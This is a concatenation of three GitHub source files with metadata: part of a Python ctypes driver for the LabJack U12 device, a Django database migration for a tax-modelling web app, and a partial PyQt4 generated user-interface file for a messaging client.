>>> dev.pulseOutStart(0, 1, 1, 1, 1, 1)
>>> {'idnum':1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
ecode = staticLib.PulseOutStart(ctypes.byref(idNum), demo, lowFirst, bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2)
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value}
def pulseOutFinish(self, timeoutMS, idNum=None, demo=0):
"""
Name: U12.pulseOutFinish(timeoutMS, idNum=None, demo=0)
Args: See section 4.27 of the User's Guide
Desc: See PulseOutStart for more information
>>> dev = U12()
>>> dev.pulseOutStart(0, 1, 1, 1, 1, 1)
>>> dev.pulseOutFinish(100)
>>> {'idnum':1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
ecode = staticLib.PulseOutFinish(ctypes.byref(idNum), demo, timeoutMS)
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value}
def pulseOutCalc(self, frequency):
"""
Name: U12.pulseOutFinish(frequency)
Args: See section 4.28 of the User's Guide
Desc: This function can be used to calculate the cycle times for PulseOut or PulseOutStart.
>>> dev = U12()
>>> dev.pulseOutCalc(100)
>>> {'frequency': 100.07672882080078, 'timeB': 247, 'timeC': 1}
"""
# Create ctypes
frequency = ctypes.c_float(frequency)
timeB = ctypes.c_long(0)
timeC = ctypes.c_long(0)
ecode = staticLib.PulseOutCalc(ctypes.byref(frequency), ctypes.byref(timeB), ctypes.byref(timeC))
if ecode != 0: raise U12Exception(ecode)
return {"frequency":frequency.value, "timeB":timeB.value, "timeC":timeC.value}
def reEnum(self, idNum=None):
"""
Name: U12.reEnum(idNum=None)
Args: See section 4.29 of the User's Guide
Desc: Causes the LabJack to electrically detach from and re-attach to the USB so it will re-enumerate
>>> dev = U12()
>>> dev.reEnum()
>>> {'idnum': 1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
ecode = staticLib.ReEnum(ctypes.byref(idNum))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value}
def reset(self, idNum=None):
"""
Name: U12.reset(idNum=None)
Args: See section 4.30 of the User's Guide
Desc: Causes the LabJack to reset after about 2 seconds
>>> dev = U12()
>>> dev.reset()
>>> {'idnum': 1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
ecode = staticLib.Reset(ctypes.byref(idNum))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value}
def resetLJ(self, idNum=None):
"""
Name: U12.resetLJ(idNum=None)
Args: See section 4.30 of the User's Guide
Desc: Causes the LabJack to reset after about 2 seconds
>>> dev = U12()
>>> dev.resetLJ()
>>> {'idnum': 1}
"""
return reset(idNum)
def sht1X(self, idNum=None, demo=0, softComm=0, mode=0, statusReg=0):
"""
Name: U12.sht1X(idNum=None, demo=0, softComm=0, mode=0, statusReg=0)
Args: See section 4.31 of the User's Guide
Desc: This function retrieves temperature and/or humidity readings from an SHT1X sensor.
>>> dev = U12()
>>> dev.sht1X()
>>> {'tempC': 24.69999885559082, 'rh': 39.724445343017578, 'idnum': 1, 'tempF': 76.459999084472656}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Create ctypes
tempC = ctypes.c_float(0)
tempF = ctypes.c_float(0)
rh = ctypes.c_float(0)
ecode = staticLib.SHT1X(ctypes.byref(idNum), demo, softComm, mode, statusReg, ctypes.byref(tempC), ctypes.byref(tempF), ctypes.byref(rh))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "tempC":tempC.value, "tempF":tempF.value, "rh":rh.value}
def shtComm(self, numWrite, numRead, datatx, idNum=None, softComm=0, waitMeas=0, serialReset=0, dataRate=0):
"""
Name: U12.shtComm(numWrite, numRead, datatx, idNum=None, softComm=0, waitMeas=0, serialReset=0, dataRate=0)
Args: See section 4.32 of the User's Guide
Desc: Low-level public function to send and receive up to 4 bytes to from an SHT1X sensor
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Check size of datatx
if len(datatx) != 4: raise ValueError("datatx must have exactly 4 elements")
# Create ctypes
datatx = listToCArray(datatx, ctypes.c_ubyte)
datarx = (ctypes.c_ubyte * 4)((0) * 4)
ecode = staticLib.SHTComm(ctypes.byref(idNum), softComm, waitMeas, serialReset, dataRate, numWrite, numRead, ctypes.byref(datatx), ctypes.byref(datarx))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "datarx":datarx}
def shtCRC(self, numWrite, numRead, datatx, datarx, statusReg=0):
"""
Name: U12.shtCRC(numWrite, numRead, datatx, datarx, statusReg=0)
Args: See section 4.33 of the User's Guide
Desc: Checks the CRC on an SHT1X communication
"""
# Create ctypes
datatx = listToCArray(datatx, ctypes.c_ubyte)
datarx = listToCArray(datarx, ctypes.c_ubyte)
return staticLib.SHTCRC(statusReg, numWrite, numRead, ctypes.byref(datatx), ctypes.byref(datarx))
def synch(self, mode, numWriteRead, data, idNum=None, demo=0, msDelay=0, husDelay=0, controlCS=0, csLine=None, csState=0, configD=0):
"""
Name: U12.synch(mode, numWriteRead, data, idNum=None, demo=0, msDelay=0, husDelay=0, controlCS=0, csLine=None, csState=0, configD=0)
Args: See section 4.35 of the User's Guide
Desc: This function retrieves temperature and/or humidity readings from an SHT1X sensor.
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
if controlCS > 0 and csLine is None: raise ValueError("csLine must be specified")
# Make sure data is 18 elements
cData = [0] * 18
for i in range(0, len(data)):
cData[i] = data[i]
cData = listToCArray(cData, ctypes.c_long)
ecode = staticLib.Synch(ctypes.byref(idNum), demo, mode, msDelay, husDelay, controlCS, csLine, csState, configD, numWriteRead, ctypes.byref(cData))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "data":cData}
def watchdog(self, active, timeout, activeDn, stateDn, idNum=None, demo=0, reset=0):
"""
Name: U12.watchdog(active, timeout, activeDn, stateDn, idNum=None, demo=0, reset=0)
Args: See section 4.35 of the User's Guide
Desc: Controls the LabJack watchdog function.
>>> dev = U12()
>>> dev.watchdog(1, 1, [0, 0, 0], [0, 0, 0])
>>> {'idnum': 1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
if len(activeDn) is not 3: raise ValueError("activeDn must have 3 elements")
if len(stateDn) is not 3: raise Value("stateDn must have 3 elements")
ecode = staticLib.Watchdog(ctypes.byref(idNum), demo, active, timeout, reset, activeDn[0], activeDn[1], activeDn[2], stateDn[0], stateDn[1], stateDn[2])
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value}
def readMem(self, address, idnum = None):
"""
Name: U12.readMem(address, idnum=None)
Args: See section 4.36 of the User's Guide
Desc: Reads 4 bytes from a specified address in the LabJack's nonvolatile memory
>>> dev = U12()
>>> dev.readMem(0)
>>> [5, 246, 16, 59]
"""
if address is None:
raise Exception, "Must give an Address."
if idnum is None:
idnum = self.id
ljid = ctypes.c_ulong(idnum)
ad0 = ctypes.c_ulong()
ad1 = ctypes.c_ulong()
ad2 = ctypes.c_ulong()
ad3 = ctypes.c_ulong()
ec = staticLib.ReadMem(ctypes.byref(ljid), ctypes.c_long(address), ctypes.byref(ad3), ctypes.byref(ad2), ctypes.byref(ad1), ctypes.byref(ad0))
if ec != 0: raise U12Exception(ec)
addr = [0] * 4
addr[0] = int(ad3.value & 0xff)
addr[1] = int(ad2.value & 0xff)
addr[2] = int(ad1.value & 0xff)
addr[3] = int(ad0.value & 0xff)
return addr
def writeMem(self, address, data, idnum=None, unlocked=False):
"""
Name: U12.writeMem(self, address, data, idnum=None, unlocked=False)
Args: See section 4.37 of the User's Guide
Desc: Writes 4 bytes to the LabJack's 8,192 byte nonvolatile memory at a specified address.
>>> dev = U12()
>>> dev.writeMem(0, [5, 246, 16, 59])
>>> 1
"""
if address is None or data is None:
raise Exception, "Must give both an Address and data."
if type(data) is not list or len(data) != 4:
raise Exception, "Data must be a list and have a length of 4"
if idnum is None:
idnum = self.id
ljid = ctypes.c_ulong(idnum)
ec = staticLib.WriteMem(ctypes.byref(ljid), int(unlocked), address, data[3] & 0xff, data[2] & 0xff, data[1] & 0xff, data[0] & 0xff)
if ec != 0: raise U12Exception(ec)
return ljid.value
def LJHash(self, hashStr, size):
outBuff = (ctypes.c_char * 16)()
retBuff = ''
staticLib = ctypes.windll.LoadLibrary("ljackuw")
ec = staticLib.LJHash(ctypes.cast(hashStr, ctypes.POINTER(ctypes.c_char)),
size,
ctypes.cast(outBuff, ctypes.POINTER(ctypes.c_char)),
0)
if ec != 0: raise U12Exception(ec)
for i in range(16):
retBuff += outBuff[i]
return retBuff
def isIterable(var):
try:
iter(var)
return True
except:
return False
def listToCArray(list, dataType):
arrayType = dataType * len(list)
array = arrayType()
for i in range(0,len(list)):
array[i] = list[i]
return array
def cArrayToList(array):
list = []
for item in array:
list.append(item)
return list
def getErrorString(errorcode):
"""
Name: U12.getErrorString(errorcode)
Args: See section 4.19 of the User's Guide
Desc: Converts a LabJack errorcode, returned by another function, into a string describing the error. No hardware communication is involved.
>>> dev = U12()
>>> dev.getErrorString(1)
>>> Unkown error
"""
errorString = ctypes.c_char_p(" "*50)
staticLib.GetErrorString(errorcode, errorString)
return errorString.value
def hexWithoutQuotes(l):
""" Return a string listing hex without all the single quotes.
>>> l = range(10)
>>> print hexWithoutQuotes(l)
[0x0, 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0x7, 0x8, 0x9]
"""
return str([hex (i) for i in l]).replace("'", "") | {
"content_hash": "1ecba101c153a518b2059085df247723",
"timestamp": "",
"source": "github",
"line_count": 2982,
"max_line_length": 327,
"avg_line_length": 38.469818913480886,
"alnum_prop": 0.5403383979706582,
"repo_name": "jf87/smap",
"id": "3c16410bee7a6779d94bf38c9a080706615c8ad1",
"size": "114717",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "python/smap/drivers/labjack/labjackpython/u12.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "325117"
},
{
"name": "HTML",
"bytes": "9642"
},
{
"name": "Java",
"bytes": "47918"
},
{
"name": "Lua",
"bytes": "9058"
},
{
"name": "Makefile",
"bytes": "5715"
},
{
"name": "Python",
"bytes": "1704999"
},
{
"name": "R",
"bytes": "23461"
},
{
"name": "Shell",
"bytes": "1273"
},
{
"name": "TeX",
"bytes": "40212"
},
{
"name": "XSLT",
"bytes": "5081"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
import webapp.apps.taxbrain.models
import jsonfield.fields
import django.db.models.deletion
from django.conf import settings
import uuidfield.fields
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0015_auto_20160201_0257'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('dynamic', '0007_dynamicsaveinputs_guids'),
]
operations = [
migrations.CreateModel(
name='DynamicBehaviorOutputUrl',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('model_pk', models.IntegerField(default=None, null=True)),
('uuid', uuidfield.fields.UUIDField(null=True, default=None, editable=False, max_length=32, blank=True, unique=True)),
('taxcalc_vers', models.CharField(default=None, max_length=50, null=True, blank=True)),
],
),
migrations.CreateModel(
name='DynamicBehaviorSaveInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('BE_inc', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
('BE_sub', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
('BE_CG_per', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
('BE_CG_trn', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
('job_ids', webapp.apps.taxbrain.models.SeparatedValuesField(default=None, null=True, blank=True)),
('first_year', models.IntegerField(default=None, null=True)),
('tax_result', jsonfield.fields.JSONField(default=None, null=True, blank=True)),
('creation_date', models.DateTimeField(default=datetime.datetime(2015, 1, 1, 0, 0))),
('micro_sim', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, to='taxbrain.OutputUrl', null=True)),
],
options={
'permissions': (('view_inputs', 'Allowed to view Taxbrain.'),),
},
),
migrations.CreateModel(
name='DynamicElasticitySaveInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('EGDP_amtr', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
('job_ids', webapp.apps.taxbrain.models.SeparatedValuesField(default=None, null=True, blank=True)),
('first_year', models.IntegerField(default=None, null=True)),
('tax_result', jsonfield.fields.JSONField(default=None, null=True, blank=True)),
('creation_date', models.DateTimeField(default=datetime.datetime(2015, 1, 1, 0, 0))),
('micro_sim', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, to='taxbrain.OutputUrl', null=True)),
],
options={
'permissions': (('view_inputs', 'Allowed to view Taxbrain.'),),
},
),
migrations.AddField(
model_name='dynamicbehavioroutputurl',
name='unique_inputs',
field=models.ForeignKey(default=None, to='dynamic.DynamicBehaviorSaveInputs'),
),
migrations.AddField(
model_name='dynamicbehavioroutputurl',
name='user',
field=models.ForeignKey(default=None, to=settings.AUTH_USER_MODEL, null=True),
),
]
| {
"content_hash": "82a89a224b616b769aa74d216f4f9869",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 143,
"avg_line_length": 53.93150684931507,
"alnum_prop": 0.6217932435864871,
"repo_name": "zrisher/webapp-public",
"id": "23d5ee54cc9a5ec20897f9a10556b1a4e54fd619",
"size": "3961",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "webapp/apps/dynamic/migrations/0008_auto_20160222_1942.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "877372"
},
{
"name": "HTML",
"bytes": "64722"
},
{
"name": "JavaScript",
"bytes": "86106"
},
{
"name": "Python",
"bytes": "406502"
},
{
"name": "Shell",
"bytes": "17"
}
],
"symlink_target": ""
} |
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(885, 580)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/can-icon-24px.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
MainWindow.setTabShape(QtGui.QTabWidget.Rounded)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.gridLayout = QtGui.QGridLayout(self.centralwidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.tabWidget = QtGui.QTabWidget(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(0, 0))
self.tabWidget.setBaseSize(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(9)
self.tabWidget.setFont(font)
self.tabWidget.setTabPosition(QtGui.QTabWidget.North)
self.tabWidget.setTabShape(QtGui.QTabWidget.Rounded)
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.inbox = QtGui.QWidget()
self.inbox.setObjectName(_fromUtf8("inbox"))
self.verticalLayout_2 = QtGui.QVBoxLayout(self.inbox)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.horizontalLayoutSearch = QtGui.QHBoxLayout()
self.horizontalLayoutSearch.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayoutSearch.setObjectName(_fromUtf8("horizontalLayoutSearch"))
self.inboxSearchLineEdit = QtGui.QLineEdit(self.inbox)
self.inboxSearchLineEdit.setObjectName(_fromUtf8("inboxSearchLineEdit"))
self.horizontalLayoutSearch.addWidget(self.inboxSearchLineEdit)
self.inboxSearchOptionCB = QtGui.QComboBox(self.inbox)
self.inboxSearchOptionCB.setObjectName(_fromUtf8("inboxSearchOptionCB"))
self.inboxSearchOptionCB.addItem(_fromUtf8(""))
self.inboxSearchOptionCB.addItem(_fromUtf8(""))
self.inboxSearchOptionCB.addItem(_fromUtf8(""))
self.inboxSearchOptionCB.addItem(_fromUtf8(""))
self.inboxSearchOptionCB.addItem(_fromUtf8(""))
self.horizontalLayoutSearch.addWidget(self.inboxSearchOptionCB)
self.verticalLayout_2.addLayout(self.horizontalLayoutSearch)
self.splitter = QtGui.QSplitter(self.inbox)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName(_fromUtf8("splitter"))
self.tableWidgetInbox = QtGui.QTableWidget(self.splitter)
self.tableWidgetInbox.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.tableWidgetInbox.setAlternatingRowColors(True)
self.tableWidgetInbox.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
self.tableWidgetInbox.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.tableWidgetInbox.setWordWrap(False)
self.tableWidgetInbox.setObjectName(_fromUtf8("tableWidgetInbox"))
self.tableWidgetInbox.setColumnCount(4)
self.tableWidgetInbox.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.tableWidgetInbox.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetInbox.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetInbox.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetInbox.setHorizontalHeaderItem(3, item)
self.tableWidgetInbox.horizontalHeader().setCascadingSectionResizes(True)
self.tableWidgetInbox.horizontalHeader().setDefaultSectionSize(200)
self.tableWidgetInbox.horizontalHeader().setHighlightSections(False)
self.tableWidgetInbox.horizontalHeader().setMinimumSectionSize(27)
self.tableWidgetInbox.horizontalHeader().setSortIndicatorShown(False)
self.tableWidgetInbox.horizontalHeader().setStretchLastSection(True)
self.tableWidgetInbox.verticalHeader().setVisible(False)
self.tableWidgetInbox.verticalHeader().setDefaultSectionSize(26)
self.textEditInboxMessage = QtGui.QTextEdit(self.splitter)
self.textEditInboxMessage.setBaseSize(QtCore.QSize(0, 500))
self.textEditInboxMessage.setReadOnly(True)
self.textEditInboxMessage.setObjectName(_fromUtf8("textEditInboxMessage"))
self.verticalLayout_2.addWidget(self.splitter)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/inbox.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.tabWidget.addTab(self.inbox, icon1, _fromUtf8(""))
self.send = QtGui.QWidget()
self.send.setObjectName(_fromUtf8("send"))
self.gridLayout_2 = QtGui.QGridLayout(self.send)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.pushButtonLoadFromAddressBook = QtGui.QPushButton(self.send)
font = QtGui.QFont()
font.setPointSize(7)
self.pushButtonLoadFromAddressBook.setFont(font)
self.pushButtonLoadFromAddressBook.setObjectName(_fromUtf8("pushButtonLoadFromAddressBook"))
self.gridLayout_2.addWidget(self.pushButtonLoadFromAddressBook, 3, 2, 1, 1)
self.label_3 = QtGui.QLabel(self.send)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout_2.addWidget(self.label_3, 4, 0, 1, 1)
self.pushButtonSend = QtGui.QPushButton(self.send)
self.pushButtonSend.setObjectName(_fromUtf8("pushButtonSend"))
self.gridLayout_2.addWidget(self.pushButtonSend, 7, 8, 1, 1)
self.horizontalSliderTTL = QtGui.QSlider(self.send)
self.horizontalSliderTTL.setMinimumSize(QtCore.QSize(35, 0))
self.horizontalSliderTTL.setMaximumSize(QtCore.QSize(70, 16777215))
self.horizontalSliderTTL.setOrientation(QtCore.Qt.Horizontal)
self.horizontalSliderTTL.setInvertedAppearance(False)
self.horizontalSliderTTL.setInvertedControls(False)
self.horizontalSliderTTL.setObjectName(_fromUtf8("horizontalSliderTTL"))
self.gridLayout_2.addWidget(self.horizontalSliderTTL, 7, 6, 1, 1)
spacerItem = QtGui.QSpacerItem(20, 297, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem, 6, 0, 1, 1)
self.comboBoxSendFrom = QtGui.QComboBox(self.send)
self.comboBoxSendFrom.setMinimumSize(QtCore.QSize(300, 0))
self.comboBoxSendFrom.setObjectName(_fromUtf8("comboBoxSendFrom"))
self.gridLayout_2.addWidget(self.comboBoxSendFrom, 2, 1, 1, 1)
self.labelHumanFriendlyTTLDescription = QtGui.QLabel(self.send)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labelHumanFriendlyTTLDescription.sizePolicy().hasHeightForWidth())
self.labelHumanFriendlyTTLDescription.setSizePolicy(sizePolicy)
self.labelHumanFriendlyTTLDescription.setMinimumSize(QtCore.QSize(45, 0))
self.labelHumanFriendlyTTLDescription.setMaximumSize(QtCore.QSize(45, 16777215))
self.labelHumanFriendlyTTLDescription.setObjectName(_fromUtf8("labelHumanFriendlyTTLDescription"))
self.gridLayout_2.addWidget(self.labelHumanFriendlyTTLDescription, 7, 7, 1, 1)
self.label_4 = QtGui.QLabel(self.send)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout_2.addWidget(self.label_4, 5, 0, 1, 1)
self.label = QtGui.QLabel(self.send)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout_2.addWidget(self.label, 3, 0, 1, 1)
self.radioButtonSpecific = QtGui.QRadioButton(self.send)
self.radioButtonSpecific.setChecked(True)
self.radioButtonSpecific.setObjectName(_fromUtf8("radioButtonSpecific"))
self.gridLayout_2.addWidget(self.radioButtonSpecific, 0, 1, 1, 1)
self.labelSendBroadcastWarning = QtGui.QLabel(self.send)
self.labelSendBroadcastWarning.setEnabled(True)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labelSendBroadcastWarning.sizePolicy().hasHeightForWidth())
self.labelSendBroadcastWarning.setSizePolicy(sizePolicy)
self.labelSendBroadcastWarning.setIndent(-1)
self.labelSendBroadcastWarning.setObjectName(_fromUtf8("labelSendBroadcastWarning"))
self.gridLayout_2.addWidget(self.labelSendBroadcastWarning, 7, 1, 1, 4)
self.radioButtonBroadcast = QtGui.QRadioButton(self.send)
self.radioButtonBroadcast.setObjectName(_fromUtf8("radioButtonBroadcast"))
self.gridLayout_2.addWidget(self.radioButtonBroadcast, 1, 1, 1, 2)
self.pushButtonTTL = QtGui.QPushButton(self.send)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButtonTTL.sizePolicy().hasHeightForWidth())
self.pushButtonTTL.setSizePolicy(sizePolicy)
self.pushButtonTTL.setMaximumSize(QtCore.QSize(32, 16777215))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.pushButtonTTL.setPalette(palette)
font = QtGui.QFont()
font.setUnderline(True)
self.pushButtonTTL.setFont(font)
self.pushButtonTTL.setFlat(True)
self.pushButtonTTL.setObjectName(_fromUtf8("pushButtonTTL"))
self.gridLayout_2.addWidget(self.pushButtonTTL, 7, 5, 1, 1)
self.label_2 = QtGui.QLabel(self.send)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout_2.addWidget(self.label_2, 2, 0, 1, 1)
self.lineEditTo = QtGui.QLineEdit(self.send)
self.lineEditTo.setObjectName(_fromUtf8("lineEditTo"))
self.gridLayout_2.addWidget(self.lineEditTo, 3, 1, 1, 1)
self.textEditMessage = QtGui.QTextEdit(self.send)
self.textEditMessage.setObjectName(_fromUtf8("textEditMessage"))
self.gridLayout_2.addWidget(self.textEditMessage, 5, 1, 2, 8)
self.pushButtonFetchNamecoinID = QtGui.QPushButton(self.send)
font = QtGui.QFont()
font.setPointSize(7)
self.pushButtonFetchNamecoinID.setFont(font)
self.pushButtonFetchNamecoinID.setObjectName(_fromUtf8("pushButtonFetchNamecoinID"))
self.gridLayout_2.addWidget(self.pushButtonFetchNamecoinID, 3, 3, 1, 1)
self.labelFrom = QtGui.QLabel(self.send)
self.labelFrom.setText(_fromUtf8(""))
self.labelFrom.setObjectName(_fromUtf8("labelFrom"))
self.gridLayout_2.addWidget(self.labelFrom, 2, 2, 1, 7)
self.lineEditSubject = QtGui.QLineEdit(self.send)
self.lineEditSubject.setText(_fromUtf8(""))
self.lineEditSubject.setObjectName(_fromUtf8("lineEditSubject"))
self.gridLayout_2.addWidget(self.lineEditSubject, 4, 1, 1, 8)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/send.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.tabWidget.addTab(self.send, icon2, _fromUtf8(""))
self.sent = QtGui.QWidget()
self.sent.setObjectName(_fromUtf8("sent"))
self.verticalLayout = QtGui.QVBoxLayout(self.sent)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.sentSearchLineEdit = QtGui.QLineEdit(self.sent)
self.sentSearchLineEdit.setObjectName(_fromUtf8("sentSearchLineEdit"))
self.horizontalLayout.addWidget(self.sentSearchLineEdit)
self.sentSearchOptionCB = QtGui.QComboBox(self.sent)
self.sentSearchOptionCB.setObjectName(_fromUtf8("sentSearchOptionCB"))
self.sentSearchOptionCB.addItem(_fromUtf8(""))
self.sentSearchOptionCB.addItem(_fromUtf8(""))
self.sentSearchOptionCB.addItem(_fromUtf8(""))
self.sentSearchOptionCB.addItem(_fromUtf8(""))
self.sentSearchOptionCB.addItem(_fromUtf8(""))
self.horizontalLayout.addWidget(self.sentSearchOptionCB)
self.verticalLayout.addLayout(self.horizontalLayout)
self.splitter_2 = QtGui.QSplitter(self.sent)
self.splitter_2.setOrientation(QtCore.Qt.Vertical)
self.splitter_2.setObjectName(_fromUtf8("splitter_2"))
self.tableWidgetSent = QtGui.QTableWidget(self.splitter_2)
self.tableWidgetSent.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.tableWidgetSent.setDragDropMode(QtGui.QAbstractItemView.DragDrop)
self.tableWidgetSent.setAlternatingRowColors(True)
self.tableWidgetSent.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
self.tableWidgetSent.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.tableWidgetSent.setWordWrap(False)
self.tableWidgetSent.setObjectName(_fromUtf8("tableWidgetSent"))
self.tableWidgetSent.setColumnCount(4)
self.tableWidgetSent.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.tableWidgetSent.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetSent.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetSent.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetSent.setHorizontalHeaderItem(3, item)
self.tableWidgetSent.horizontalHeader().setCascadingSectionResizes(True)
self.tableWidgetSent.horizontalHeader().setDefaultSectionSize(130)
self.tableWidgetSent.horizontalHeader().setHighlightSections(False)
self.tableWidgetSent.horizontalHeader().setSortIndicatorShown(False)
self.tableWidgetSent.horizontalHeader().setStretchLastSection(True)
self.tableWidgetSent.verticalHeader().setVisible(False)
self.tableWidgetSent.verticalHeader().setStretchLastSection(False)
self.textEditSentMessage = QtGui.QTextEdit(self.splitter_2)
self.textEditSentMessage.setReadOnly(True)
self.textEditSentMessage.setObjectName(_fromUtf8("textEditSentMessage"))
self.verticalLayout.addWidget(self.splitter_2)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/sent.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.tabWidget.addTab(self.sent, icon3, _fromUtf8(""))
self.youridentities = QtGui.QWidget()
